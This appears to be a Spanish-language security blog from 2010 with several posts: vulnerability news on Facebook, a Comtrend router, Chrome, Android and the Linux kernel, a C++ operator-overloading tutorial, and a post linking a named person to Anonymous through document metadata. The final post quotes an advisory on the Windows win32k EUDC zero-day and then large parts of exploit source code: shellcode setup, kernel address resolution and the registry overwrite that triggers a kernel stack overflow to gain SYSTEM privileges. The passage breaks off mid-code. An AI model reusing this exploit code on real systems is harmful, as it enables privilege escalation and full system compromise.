3) Permite a un atacante saber fácilmente cual es el mail ligado a la cuenta de Facebook y las consecuencias que esto conlleva.

-----------

Este error no involucra solamente a la dirección con la cual se registro la cuenta de Facebook, si no con todas las direcciones de correo asociadas a la cuenta, e incluso también el numero de movil.
En conclusión, cuidado con los datos que asocian con su cuenta de Facebook ya que no están para nada protegidos.

Saludos!

Update

Al día de la fecha -08/02/2011- el fallo se encuentra solucionado.

Sobrecarga de operadores en C++.

2010-12-21T19:36:00.001-03:00

Últimamente he visto algunas dudas respecto de este tema en la sección de C/C++ de elhacker.net -sección en la cual soy moderador-. Este tipo de dudas suelen ser las que mas me gustan, porque a simple vista parecen simples pero en el fondo hay una complejidad que la mayoría de las personas que están aprendiendo ese lenguaje todavía no conocen.

No voy a extenderme demasiado pero simplemente aclarar algunos puntos que suelen ser los que mas dudas generan. No escribiré todo en una sola entrada por supuesto, probablemente tome varias. En esta comenzare con lo básico del tema.

Otro detalle es que hace mucho que no posteo ninguna entrada relacionada a la programación, y siendo que es una de las áreas que mas me gusta creo que ya viene siendo hora.

Introducción

Cuando desarrollas una aplicación y se diseña la interfaz gráfica, siempre se tiene en mente el usuario final. No hay reglas generales que sirvan para diseñar una interfaz excelente que le guste a todos los usuarios, por esa razón uno trata de hacer la interfaz lo mas intuitiva posible, lo mas accesible que se pueda, y por sobre todas las cosas, fácil de manejar y de recordar.

Cuando desarrollas una clase o un conjunto de estas, también realizas un producto para un usuario final, con la diferencia que en este caso el usuario final es a la vez un programador.
Este simple hecho suele dar la falsa noción que, al ser el usuario final un programador, este tiene que entender todas las locuras que hayamos hecho a la hora de codificar. Es decir, "A fin de cuentas es un programador o no? si es muy bueno sabrá porque hice esto y aquello." son ideas que suelen existir en muchos programadores y que influyen negativamente en el resultado final.

Al igual que con la interfaz gráfica de una aplicación, la interfaz de una clase también debe diseñarse. Esta debe ser intuitiva, accesible, fácil de recordar y de manejar. Es aquí cuando entra la sobrecarga de operadores.

Para que se utiliza la sobrecarga de operadores?

La sobrecarga de operadores es una manera sencilla de simplificar los significados de ciertas operaciones que trabajen con tipos definidos por nosotros mismos (Lo que usualmente en C++ es una clase).
El objetivo final es reducir la curva de aprendizaje de nuestra clase al proveer una interfaz intuitiva que sea fácil de utilizar y recordar.

La idea principal radica en intentar simplificar los significados de las operaciones que realizamos con nuestras clases sobrecargando los operadores que mas se relacionen con lo que realmente se quiere hacer.

Si tuviésemos una clase que contiene un entero, y quisiésemos proveer una interfaz para sumar varios objetos sin utilizar sobrecarga de operadores, tendríamos que realizar un método que sume. Por ejemplo, algo así:

MiClase Resultado = sum(Clase1,Clase2);

A simple vista no parece muy complicado, pero que pasa si queremos sumar 4 objetos?

MiClase Resultado = sum(sum(Clase1,Clase2),sum(Clase1,Clase2));// No muy intuitivo que digamos.

Realmente no se ve muy agradable verdad?

Ahora veamos un ejemplo sobrecargando operadores:

#include <iostream>
class MiClase
{
private:
int Num;
public:
MiClase(int Cnum) { Num = Cnum; }
friend MiClase operator+(const MiClase &a, const MiClase &b);
int ObtNum() { return Num; }
};
MiClase operator+(const MiClase &a, const MiClase &b)
{
return MiClase(a.Num + b.Num);
}
int main()
{
MiClase Clase1(10);
MiClase Clase2(20);

//Intuitivo, c=a+b;
MiClase Resultado = Clase1 + Clase2 + Clase1 + Clase2;
std::cout << "El resultado es: " << Resultado .ObtNum() << std::endl;
return 0;
}

No inquietarse si el código no se entiende a la primera. Ya iré explicando con detalles mas adelante.

Que tiene que ver esto con la seguridad informática?

Directamente nada, indirectamente mucho. La mayoría de las vulnerabilidades en las aplicaciones se dan por errores de diseño u por descuidos. Al proveer una interfaz intuitiva para tu clase, logras reducir la tasa de errores de los programadores que la utilicen, facilitando el desarrollo de aplicaciones mas seguras y estables.

Cuando utilizar la sobrecarga de operadores?

Es normal que cuando uno intente resolver un problema, analice varias soluciones posibles, y luego bajo criterio propio elija la mas adecuada para el caso determinado. Realmente es imposible tener una regla que aplique para todos los casos, y lo que hoy es mejor para determinada aplicación, puede ser lo peor para otra, por lo tanto nunca deben tomarse reglas absolutas y siempre hay que analizar el caso en particular. Sin embargo, se pueden seguir una pauta que es clave para decidir si se debe o no sobrecargar operadores. Muchas personas usualmente me preguntan porque se utiliza la sobrecarga de operadores siendo que los beneficios que otorga no compensan el posible desorden del código. En reglas generales respondo siempre lo mismo: La sobrecarga de operadores no se utiliza para hacernos la vida mas fácil, si no para hacerle la vida mas fácil a los otros, a los usuarios de tus clases. Hacerle la vida mas fácil a los usuarios finales de tu clase es la regla principal que se debe seguir. Si se esta seguro de poder lograrlo, perfecto, pero si no se esta seguro lo mejor es volver a analizar el caso en particular ya que tal vez sobrecargar operadores no sea necesario o incluso puede volverse perjudicial.

Comenzando con la sobrecarga de operadores

Antes que nada es esencial saber lo que es un operador. Un operador es un token que le indica al compilador que se van a realizar determinadas operaciones sobre objetos u variables –los operandos-. Es decir, si tenemos: a= b+c; donde a, b y c son enteros, podemos decir que tenemos 3 operandos (a, b y c) y 2 operadores (= y +). El comportamiento de la expresión y su significado están definidos por el lenguaje. Ahora bien, C++ permite redefinir el comportamiento de la mayoría de los operadores para que realicen una tarea aparentemente similar a la que originalmente realizan pero con un comportamiento especifico acorde a los tipos de datos que hayamos creado, por ende podemos tener algo como: a=b+c; donde a,b y c son objetos del tipo MiClase. Particularmente los operadores que se pueden sobrecargar son:

+     -     *     /     %     ^     &
|     ~     !     =     <     >     +=
-=    *=    /=    %=    ^=    &=    |=
<<    >>    >>=   <<=   ==    !=    <=
>=    &&    ||    ++    --    ->*    ,
->    []    ()    new   new[] delete delete[]

Los que no pueden sobrecargarse son:

Selector directo de componente .
Operador de indirección de puntero-a-miembro .*
Operador de acceso a ámbito ::
Condicional ternario ?:
Directivas de preprocesado # y # #
sizeof , typeid (si, son operadores también)

Cabe destacar que al sobrecargar un operador se puede modificar su comportamiento pero no cambiar el numero de operandos, ni la asociatividad ni la precedencia del operador respectivo.

Sintaxis de la sobrecarga de operadores

El prototipo de una sobrecarga de operador puede definirse como:

<tipo de retorno> operator + (parametros) {logica} ;

Es decir, el tipo de retorno, sumado al especificador operator seguido del operador que se desea sobrecargar. Veamos de nuevo el ejemplo inicial:

MiClase operator+(const MiClase &a, const MiClase &b);

Para definir la lógica del operador, en este caso basta con definirla como si fuese cualquier otra función:

MiClase operator+(const MiClase &a, const MiClase &b)
{
return MiClase(a.Num + b.Num);
}

Cabe destacar que que al sobrecargar un operador, como mínimo uno de los operandos debe ser un tipo definido por el usuario (generalmente una clase). No se puede sobrecargar un operador para que trabaje con dos tipos primitivos. Por ejemplo, alguien puede pensar en sobrecargar el operador “=” para poder asignar una cadena char* a otra cadena char* copiando el contenido como si fuese strcpy en lugar de asignar la dirección a la que apunta el puntero. Seria una idea valida, pero C++ no lo permite y por un motivo bastante claro. Si una operación tan simple como 1+1 puede tener distintos significados, el compilador nunca estaría seguro de lo que 1+1 significa.

Miembros de la clase o función friend

Una de las dudas mas recurrentes es si un método debe ser miembro de la clase o una función friend. Pero primero que nada, que significa el especificador friend? La razón por la cual existen métodos públicos, protegidos y privados radica en permitir al programador encapsular la implementación de su clase de la interfaz de esta. En la mayoría de las situaciones esto es esencial, pero hay casos específicos en el cual dicho esquema se torna un tanto rígido para lo que en realidad queremos hacer. Ahí es cuando entra el especificador friend, el cual permite que una función/clase tenga acceso total a otra clase de la cual no es miembro, saltando en cierta forma, el mecanismo de métodos públicos protegidos y privados. La ventaja principal de las funciones friend es que la sintaxis suele ser mas legible dado que la llamada a un miembro es a.func() mientras que una función friend es simplemente func(). Dado esto el programador debe decidir cual de las dos sintaxis es mas legible para el caso en particular y optar por ella. La sobrecarga de un operador en la mayoría de las oportunidades requiere acceso a datos privados de la clase (siempre que no haya un miembro wrapper mediante) y una sintaxis agradable a la vista. Esas son las razones principales por la cual generalmente las sobrecarga de los operadores van acompañadas del especificador de acceso friend. No obstante los permisos otorgados a una clase/función no son hereditarios, transitivos ni recíprocos, es decir, casi igual que en la vida real:

Si tenemos una clase A que es amiga de B, las derivadas de la clase A no necesariamente tienen que tener acceso a la clase B. Es decir, la amistad no es hereditaria
.
Si tenemos una clase A que es amiga de B, y B es amiga de C, A no tiene porque ser amiga de C. Es decir, la amistad no es transitiva.
Si tenemos una clase A que es amiga de B, B no tiene porque ser amiga de A. Es decir, la amistad no es reciproca.

Estas 3 reglas perjudican en cierta forma el concepto de orientación a objetos, y por esa razón una de las desventajas de las funciones friend es que requieren código extra para integrarlas completamente en un diseño OO. Las funciones friend deben utilizarse como una extensión de la interfaz y no mas, no debe abusarse. Por lo tanto la regla principal es usar miembros cuando puedas y funciones friend cuando debas. Siendo que las funciones friend no son miembros de una clase, no pueden declararse virtuales, por lo tanto el enlace dinamico (dynamic binding) no es posible directamente. Recordemos que para que un diseño sea orientado a objetos realmente, las funciones virtuales son necesarias, de lo contrario estamos hablando de un diseño basado en objetos. Supongamos que queremos proveer una sobrecarga de operador que tenga la posibilidad de imprimir todo un grupo de clases. Dadas las limitaciones que vimos anteriormente, alguien podría pensar que la única forma es implementar la sobrecarga en cada clase, pero esto es un tanto incomodo, engorroso, y de seguro aumenta el costo de mantenimiento y con esto los posibles futuros fallos. Para resolver este pequeño problema, lo que se suele hacer es declarar una función friend de la clase base. Esta función simplemente delega el trabajo a otra función que es miembro que si es virtual, siendo esta ultima la que se reemplaza en cada clase derivada para realizar la tarea.

class Base {
public:
friend ostream& operator << (ostream& o, const Base& b);
protected:
virtual void print(ostream& o) const
{ ... }
};
inline std::ostream& operator<< (std::ostream& o, const Base& b)
{
b.print(o); // Delega el trabajo a la funciÃ³n polimorfica
return o;
}
class Derived : public Base {
protected:
virtual void print(ostream& o) const
{ ... }
};

Esto se conoce como Virtual Friend Function Idiom. Por hoy dejo esto aquí para no liar a nadie, cualquier duda y demás, aquí, por mail o en el foro Para la próxima sigo con los templates, q es otra de las causas de dolores de cabeza. Saludos!

Fallo de seguridad en el router COMTREND.

2010-12-15T11:36:00.003-03:00

Desde SeguridadWireless informan de la detección de un fallo de seguridad en el router COMTREND modelo CT-5365. Este fallo de seguridad afecta a la generación de la clave WPA-PSK con que dicho modelo de router viene configurado por defecto y permite averiguar y/o predecir dicha clave de forma trivial.

Así mismo han comprobado y verificado que este fallo afecta a varios de los ISP que en España distribuyen este modelo de router a usuarios domésticos.

Mas información en SeguridadWireless.

#Update

Las compañías involucradas aparentemente han pedido que la información se mantenga en secreto por el momento.
Muchos rumores han corrido bajo el puente, que hubo dinero en el medio, que hubo demandas y demas mentiras de gente que le gusta hablar por hablar.

La realidad es que simplemente las compañías han pedido que las características técnicas del fallo no se publiquen mientras el fabricante puede solucionarlo.
Verdaderamente la ética de seguridadwireless.net es incuestionable, y realmente que haya tantos rumores en contra demuestra que hay bastante envidia de parte de muchos, lo cual en cierta forma demuestra que el trabajo lo vienen haciendo bien, hecho del cual tampoco quedan dudas.

Lamentablemente hay una realidad negativa en todo este asunto. Las compañías telefónicas tendrán que realizar un cambio masivo de equipos (millones de personas) para que el fallo pueda ser erradicado completamente independientemente de si el fallo se resuelve ya mismo por parte del fabricante. Por esa misma razón dudo mucho que los datos técnicos del fallo y las pruebas de concepto se liberen a corto plazo.

Veremos como sigue esta historia, que por suerte va de la mano de personas respetables como las que conforman seguridadwireless.net; lugar donde el único objetivo y preocupación es mejorar la seguridad de las redes de todos.

Nueva versión de Chrome, nuevos bugs arreglados!

2010-12-14T14:19:00.005-03:00

Google ha publicado una nueva versión de su navegador Chrome, arreglando dos bugs graves así como también otros fallos menores. Chrome 8.0.552.224 esta disponible en los canales stable y beta.

El primer fallo afectaba solamente a las plataformas Linux 64-bit debido a una validación errónea. Mientras que el segundo fallo se debía a los siempre molestos Stale pointers. Mas detalles se pueden encontrar en el SVN log.

Lista de bugs y recompensas:

[64-bit Linux only] [56449] High Bad validation for message deserialization on 64-bit builds. Credit to Lei Zhang of the Chromium development community.
[60761] Medium Bad extension can cause browser crash in tab handling. Credit to kuzzcc.
[63529] Low Browser crash with NULL pointer in web worker handling. Credit to Nathan Weizenbaum of Google.
[$1000] [63866] Medium Out-of-bounds read in CSS parsing. Credit to Chris Rohlf.
[$1000] [64959] High Stale pointers in cursor handling. Credit to Sławomir Błażek and Sergey Glazunov.

Como se puede apreciar, $1000 para Chris Rohlf y otros $1000 para Sławomir Błażek y Sergey Glazunov. Gracias al programa de recompensas de Google.

Herramienta utilizada para realizar DDoS podria revelar la identidad del grupo Anonymous

2010-12-13T20:58:00.002-03:00

Un nuevo estudio demuestra que el software utilizado para realizar los ataques DDoS utilizado por el grupo "Anonymous" podría servir para descubrir las identidades de los individuos que utilizaron dicho software.

El software denominado Low Orbit Ion Cannon (LOIC) es una herramienta desarrollada en primera instancia con el objetivo de realizar pruebas de estrés (DoS) . No obstante es la herramienta utilizada para llevar a cabo los ataques DDoS que en el ultimo tiempo se han vuelto un actor principal en la guerra entre WikiLeaks y Estados Unidos.
La versión modificada que utiliza el grupo "Anonymous" permite realizar los ataques manualmente u simplemente formar parte de un ataque con solo utilizar la aplicación. Sin embargo, acorde a un estudio publicado, la identidad de las personas que utilizaron el software en pos de participar en los ataques podria descubrirse, ya que la aplicación falla notablemente en la tarea de ocultar las direcciones IP de los usuarios que lo utilizan, directamente ni siquiera lo intenta.

Podria ocurrir que las autoridades decidan dar ejemplos arrestando a varias personas involucradas en los ataques.
En el FAQ de LOIC se puede encontrar preguntas como estas:

Q: “Will I get caught/arrested for using it?”
A: Chances are next to zero. Just blame you have a virus, or simply
deny any knowledge of it.

Es decir, remarcan que es improbable que esto pueda llevarse a cabo dado que uno podría aludir estar infectado y haber formado parte del ataque sin quererlo realmente, lo cual es muy difícil de comprobar pero a la vez muy difícil de refutar.

Por otro lado, el estudio haciendo hincapié en el FAQ de LOIC, aclara:

We would like to rephrase the question as: is it technically feasible to identify
a participant in the Anonymous operation? The answer depends on two factors:
the tool and the generated data.

Hasta el dia de hoy, solo un chico de 16 años ha sido arrestado por formar parte de los ataques.

A ver como sigue esta historia.

Referencias:
LOIC Report
Hacking Tool Used By Anonymous Could Reveal Users Identity
Dutch Arrest 16 Year Old for Wikileaks Attack

Documental de WikiLeaks. "WikiRebels – The Documentary"

2010-12-11T18:49:00.000-03:00

Alex Tapanaris == Anonymous?

2010-12-11T16:19:00.001-03:00

Parece que la gente de "Anonymous" no esta al tanto de la información que se puede conseguir mediante la extracción de metadatos. Por lo menos no lo estuvo quien realizo el comunicado de prensa que acaba de salir:

A ver que nos muestra el documento utilizando la querida Foca:

Aparentemente se le ocurrió a mucha gente hacer lo mismo dado que si se busca en Google algo como "Alex Tapanaris anonymous" se encuentran bastantes links con la misma información. Incluso ya han publicado datos personales como domicilio, teléfono, entre otras cosas.

Sera un nombre falso o un descuido por parte de Alex? a saber!

Exploit para kernel Linux 2.6.x permite la elevación local de privilegios

2010-12-09T16:26:00.000-03:00

Exploit para kernel Linux 2.6.x permite la elevación local de privilegios
-------------------------------------------------------------------------

Dan Rosenberg ha publicado un exploit para el kernel de Linux 2.6.x que permite a un usuario local elevar privilegios.
El exploit hace uso de tres vulnerabilidades publicadas por Nelson Elhage (CVE-2010-4258, CVE-2010-3849, CVE-2010-3850).

A continuación se detallan las distintas vulnerabilidades:

CVE-2010-4258: Existe un error de falta de comprobación de límites en
la función set_fs(KERNEL_DS que podría ser aprovechado por un atacante
local para elevar privilegios a través de vectores relacionados con la
creación de un hilo con la bandera CLONE_CHILD_CLEARTID activada.

CVE-2010-3849: Existe un error de comprobación de restricciones en la
función 'econet_sendmsg' del protocolo Econet que podría causar una
referencia a puntero nulo. Esto podría ser aprovechado por un atacante
local para causar una denegación de servicio a través de una llamada a
la función 'econet_sendmsg' con el valor dirección remota instanciado a
NULL.

CVE-2010-3850: Existe un error en la función 'ec_dev_ioctl' en el
protocolo Econet que no comprueba el valor de la variable 'SIOCSIFADDR'.
Esto podría ser aprovechado por un atacante local para ejecutar código
arbitrario a través de una llamada a 'ec_dev_ioctl' especialmente
manipulada.

Actualmente Debian y Ubuntu han publicado actualizaciones para las vulnerabilidades CVE-2010-3849 y CVE-2010-3850, por lo que no tendría éxito el exploit. Tan poco sería posible llevarlo a cabo en sistemas Red Hat ya que por defecto no integran el protocolo Econet.

Referencia: http://seclists.org/fulldisclosure/2010/Dec/85
Fuente: http://www.hispasec.com/unaaldia/4427/

[Ehn-Dev 2010] - Concurso de desarrollo de aplicaciones @ elhacker.net

2010-11-30T20:30:00.002-03:00

Termino el periodo de entrega de aplicaciones del concurso de desarrollo de aplicaciones, para dar paso a las votaciones.
Lamentamos los que no pudieron participar porque se enteraron tarde u porque no tuvieron tiempo para trabajar en su proyecto, pero esperamos y alentamos a todos a que participen en la próxima edición del concurso!

De mi parte, y de parte de todo el staff de elhacker.net, quiero felicitar a todos los que han participado, ya que independientemente de quienes estén en los primeros puestos, todos son ganadores al participar.
Especiales felicitaciones a las personas que decidieron involucrarse en el concurso a pesar de tener poco tiempo en el mundo de la programación, y a los que no son nuevos pero han tenido complicaciones con sus horarios, y así y todo han sacado tiempo de donde no lo hay para poder estar. Doy fe que se han esforzado bastante para participar y eso vale mucho para todos nosotros.

Espero que se hayan divertido programando y que hayan aprendido algo nuevo en el camino.

Comienzan las votaciones!

Para emitir tu voto, entra aquí!

Lista de aplicaciones:

Grave fallo en Android

2010-11-26T16:21:00.002-03:00

Un fallo que permite que podría permitir al atacante obtener cualquier fichero en principio de la tarjeta SD, pero también podría utilizarse para obtener información y datos alojados en el movil.

Características de la vulnerabilidad:

El navegador no pregunta donde descargar el archivo, automáticamente se descarga en "/sdcard/download/payload.html".

Sabiendo lo anterior, utilizando javascript podemos abrir el archivo malicioso logrando que el navegador muestre el archivo local.

Al abrir un archivo HTML dentro del contexto local, el navegador ejecuta javascript sin advertir al usuario.

Vídeo demostración después del salto.

Fuente: Android Data Stealing Vulnerability

Demostración de la escalada de privilegios en Windows Vista/7 (UAC) en video

2010-11-26T13:26:00.001-03:00

0 day: Elevación de privilegios en Microsoft Windows

2010-11-25T14:43:00.001-03:00

Se ha públicado un nuevo 0 day en Microsoft Windows que permite a un
usuario local obtener privilegios de SYSTEM (control total sobre el
sistema) eludiendo cualquier control de usuario.

Los detalles técnicos se han hecho públicos, así como el código fuente y
el programa necesarios para aprovechar el fallo. El exploit se aprovecha
de la forma en la que el controlador win32k.sys procesa ciertos valores
del registro. En concreto, el exploit manipula el valor
SystemDefaultUEDCFont del registro y activa el soporte para EUDC
(End-User-Defined-Characters) a través de la función EnableEUDC.

Esto quiere decir que el atacante debe crear una clave en el registro
donde un usuario no administrador tiene privilegios para hacerlo. Luego
intenta leerla, provoca el fallo en el driver y obtiene los privilegios.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

-------------------------------------------------------------------
Hispasec - una-al-día 25/11/2010
Todos los días una noticia de seguridad www.hispasec.com
-------------------------------------------------------------------

0 day: Elevación de privilegios en Microsoft Windows
----------------------------------------------------

Se ha públicado un nuevo 0 day en Microsoft Windows que permite a un
usuario local obtener privilegios de SYSTEM (control total sobre el
sistema) eludiendo cualquier control de usuario.

Los detalles técnicos se han hecho públicos, así como el código fuente y
el programa necesarios para aprovechar el fallo. El exploit se aprovecha
de la forma en la que el controlador win32k.sys procesa ciertos valores
del registro. En concreto, el exploit manipula el valor
SystemDefaultUEDCFont del registro y activa el soporte para EUDC
(End-User-Defined-Characters) a través de la función EnableEUDC.

Esto quiere decir que el atacante debe crear una clave en el registro
donde un usuario no administrador tiene privilegios para hacerlo. Luego
intenta leerla, provoca el fallo en el driver y obtiene los privilegios.
La prueba de concepto utiliza esta clave:

HKEY_USERS\[SID DEL USUARIO]\EUDC

La prueba de concepto funciona perfectamente en Windows Vista, 7 y 2008
totalmente parcheados. Tanto si el usuario pertenece al grupo de
usuarios como al de administradores (incluso con la protección UAC
activa), se obtendrán privilegios sin ningún tipo de advertencia por
parte de Windows y por supuesto, sin necesidad de conocer la contraseña.

En Windows XP, la prueba de concepto no funciona (no existe por defecto
esa rama del registro) pero es posible que la vulnerabilidad también le
afecte. La prueba de concepto no es detectada por ningún motor en estos
momentos: VirusTotal

Para que este fallo fuese aprovechado por un atacante o malware, primero
debería acceder al sistema por cualquier otro medio y encontrarse con
que no puede realizar los cambios que desea a causa de los permisos.
Realmente, este no suele ser un impedimento para el malware masivo
(puesto que el usuario medio suele o bien obviar el UAC o bien
deshabilitarlo o bien en XP pertenecer al grupo de administradores). Sí
que es posible que este fallo sea usado en ataques dirigidos o entornos
profesionales, donde los usuarios de escritorio suelen tener privilegios
limitados en el dominio.

Con este fallo, ya son dos problemas de elevación de privilegios que
Microsoft debe arreglar. El fallo anterior fue descubierto en el cuerpo
del famoso troyano Stuxnet. A través del programador de tareas, el
malware era capaz de elevar privilegios en el equipo infectado. Hace
algunos días los detalles de esta vulnerabilidad también se hicieron
públicos.

El equipo de seguridad de Microsoft ha declarado en su twitter que está
investigando el asunto. Un método para prevenir el problema hasta que
exista parche oficial es limitar los permisos del usuario en la rama

HKEY_USERS\[SID DEL USUARIO]\EUDC

En el registro, se debe negar el permiso de escritura a los usuarios no
administradores. Gráficamente, es sencillo (localizar el SID del
usuario, botón derecho sobre la rama del registro y denegar).

Para automatizar el proceso, aconsejamos (aunque puede tener efectos
secundarios, hágalo bajo su responsabilidad) utilizar subinacl.exe, una
herramienta oficial de Microsoft descargable desde aquí.

Una vez instalada, localizar el SID del usuario (normalmente terminará
en 1000) y el nombre de máquina y usuario con el comando:

whoami /user:

INFORMACIÓN DE USUARIO
----------------------

Nombre de usuario SID
==============================================
ordenador\usuario S-1-5-21-123456789-12345677889-123445678990-1000

y ejecutar:

subinacl.exe /subkeyreg "HKEY_USERS\
S-1-5-21-123456789-12345677889-123445678990-1000\EUDC /deny=
ordenador\usuario=w

Esto evitará que el usuario pueda escribir en esa rama y por tanto la
prueba de concepto no funcionará. Repetir para el resto de usuarios en
el equipo si los hubiera.

Opina sobre esta noticia:
http://www.hispasec.com/unaaldia/4415/comentar

Más información:

POC:
http://www.exploit-db.com/sploits/uacpoc.zip

We 're investigating public PoC for a local EoP vuln requiring an
account on the target system
http://twitter.com/msftsecresponse

Fuente Hispasec.

El articulo de CodeProject (que luego fue movido):

Introduction

I would like to present an exploit of an ambiguous parameter in Windows kernel API that leads to buffer overflows under nearly every version of Microsoft Windows, especially one that can be used as a backdoor to Windows user privilege system as well as User Access Control.

The starring API would be RtlQueryRegistryValues, it meant to be used to query multiple registry values by a query table, given the EntryContext field as output buffer. There is a problem that this field can be either treated as a UNICODE_STRING structure or a ULONG buffer length followed by the actual buffer, and this is determined by the type of the registry key being queried.
Using the code

In this example, I found a registry key which can be manipulated with only user rights, by changing its type to REG_BINARY overflows the kernel. When Win32k.sys->NtGdiEnableEudc queries HKCU\EUDC\[Language]\SystemDefaultEUDCFont registry value, it assumes that the registry value is REG_SZ, so the buffer provided on stack is a UNICODE_STRING structure, of which the first ULONG value in this structure represents the length of the string buffer, but if the value in registry is REG_BINARY type, it will be wrongly interpreted as the length of the given buffer, thus overwrites the stack.
Collapse

.text:BF81BA91                 push    esi             ; Environment
.text:BF81BA92                 push    esi             ; Context
.text:BF81BA93                 push    offset ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A ; QueryTable
.text:BF81BA98                 push    edi             ; Path
.text:BF81BA99                 lea     eax, [ebp+DestinationString]
.text:BF81BA9C                 push    esi             ; RelativeTo
.text:BF81BA9D                 mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.QueryRoutine, esi ; _RTL_QUERY_REGISTRY_TABLE * SharedQueryTable
.text:BF81BAA3                 mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.Flags, 24h
.text:BF81BAAD                 mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.Name, offset aSystemdefaulte ; "SystemDefaultEUDCFont"
.text:BF81BAB7                 mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.EntryContext, eax
.text:BF81BABC                 mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultType, esi
.text:BF81BAC2                 mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultData, esi
.text:BF81BAC8                 mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultLength, esi
.text:BF81BACE                 mov     dword_BFA198FC, esi
.text:BF81BAD4                 mov     dword_BFA19900, esi
.text:BF81BADA                 mov     dword_BFA19904, esi
.text:BF81BAE0                 call    ds:__imp__RtlQueryRegistryValues@20 ; RtlQueryRegistryValues(x,x,x,x,x)
.text:BF81BAE6                 mov     [ebp+var_8], eax

Stack trace shows the calling process is as follows:

GDI32.EnableEUDC ->
NtGdiEnableEudc ->
GreEnableEUDC ->
sub_BF81B3B4 ->
sub_BF81BA0B ->
RtlQueryRegistryValues (Overflow occurs)

Given this we can design the registry value which will precisely overwrite the return address of the calling function on stack, results in an arbitrary buffer being executed in kernel mode. In my PoC the buffer contains a simple kernel PE loader, which will eventually load a driver that will escalate "cmd.exe” process privilege regardless of UAC.
Collapse

// Allocate buffer for the driver
LPVOID pDrvMem = VirtualAlloc(NULL, sizeof(DrvBuf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(pDrvMem, DrvBuf, sizeof(DrvBuf));

BYTE* pMem;            // shellcode
DWORD ExpSize = 0;

BYTE RegBuf[0x40] = {0};    // reg binary buffer

pMem = (BYTE*)VirtualAlloc(NULL, sizeof(Data), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(pMem, Data, sizeof(Data));                // Copy shellcode

*(DWORD*)(RegBuf + 0x1C) = (DWORD)pMem;        // Point return value to our buffer

ExpSize = 0x28;

The shellcode need some kernel APIs, we need to get their addresses from the running kernel.
Collapse

// Get the running kernel file name
HMODULE hDll = GetModuleHandle(L"ntdll.dll");
pfnZwQuerySystemInformation fnZwQuerySystemInformation = (pfnZwQuerySystemInformation)GetProcAddress(hDll,"ZwQuerySystemInformation");
PSYSTEM_MODULE_INFORMATIONS pModInfo = NULL;
ULONG AllocSize = 0;
fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);

pModInfo = (PSYSTEM_MODULE_INFORMATIONS)malloc(AllocSize);
fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);
HMODULE hKernel = LoadLibraryExA(pModInfo->modinfo[0].ImageName + pModInfo->modinfo[0].ModuleNameOffset, NULL, DONT_RESOLVE_DLL_REFERENCES);

//Relocation to the running kernel base
DWORD Delta = (DWORD)pModInfo->modinfo[0].Base - (DWORD)hKernel;

free(pModInfo);

// For Vista, there is a Pool address on the stack which is going to be passed to ExFreePool before the function returns,
// so we need a valid pool address to avoid BSOD.

if(vi.dwBuildNumber < 7600)
{
    FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x2C);

    HANDLE hDummy = CreateSemaphore(NULL, 10, 10, L"Local\\PoC");
    PSYSTEM_HANDLE_INFORMATION pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(sizeof(SYSTEM_HANDLE_INFORMATION));
    AllocSize = sizeof(SYSTEM_HANDLE_INFORMATION);
    fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);

    pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(pHandleInfo, AllocSize);
    fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);

    for(DWORD i = 0; i < pHandleInfo->NumberOfHandles; i++)
    {
        if((HANDLE)pHandleInfo->Handles[i].HandleValue == hDummy)
        {
            *(DWORD*)(RegBuf + 0x4) = (DWORD)(pHandleInfo->Handles[i].Object) - 0x18;
            break;
        }
    }
    free(pHandleInfo);
}
else
{
    FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x30);
}

// Now fills the API addresses needed
FixDWORD(pMem, sizeof(Data), 0x11111111, (DWORD)GetProcAddress(hKernel, "ExAllocatePoolWithTag") + Delta);
FixDWORD(pMem, sizeof(Data), 0x22222222, (DWORD)GetProcAddress(hKernel, "RtlInitAnsiString") + Delta);
FixDWORD(pMem, sizeof(Data), 0x33333333, (DWORD)GetProcAddress(hKernel, "RtlAnsiStringToUnicodeString") + Delta);
FixDWORD(pMem, sizeof(Data), 0x44444444, (DWORD)GetProcAddress(hKernel, "MmGetSystemRoutineAddress") + Delta);
FixDWORD(pMem, sizeof(Data), 0x55555555, (DWORD)GetProcAddress(hKernel, "RtlFreeUnicodeString") + Delta);
FixDWORD(pMem, sizeof(Data), 0x66666666, (DWORD)GetProcAddress(hKernel, "memcpy") + Delta);
FixDWORD(pMem, sizeof(Data), 0x77777777, (DWORD)GetProcAddress(hKernel, "memset") + Delta);
FixDWORD(pMem, sizeof(Data), 0x88888888, (DWORD)GetProcAddress(hKernel, "KeDelayExecutionThread") + Delta);
FreeLibrary(hKernel);

// Here we tell the shellcode(PE loader) where the driver buffer is.
FixDWORD(pMem, sizeof(Data), 0x11223344, sizeof(DrvBuf));
FixDWORD(pMem, sizeof(Data), 0x55667788, (DWORD)pDrvMem);

Finally, we set the registry value and call GDI32.EnableEUDC to fire the exploit.
Collapse

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage);        // Get current code page
HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL, &hKey, NULL);
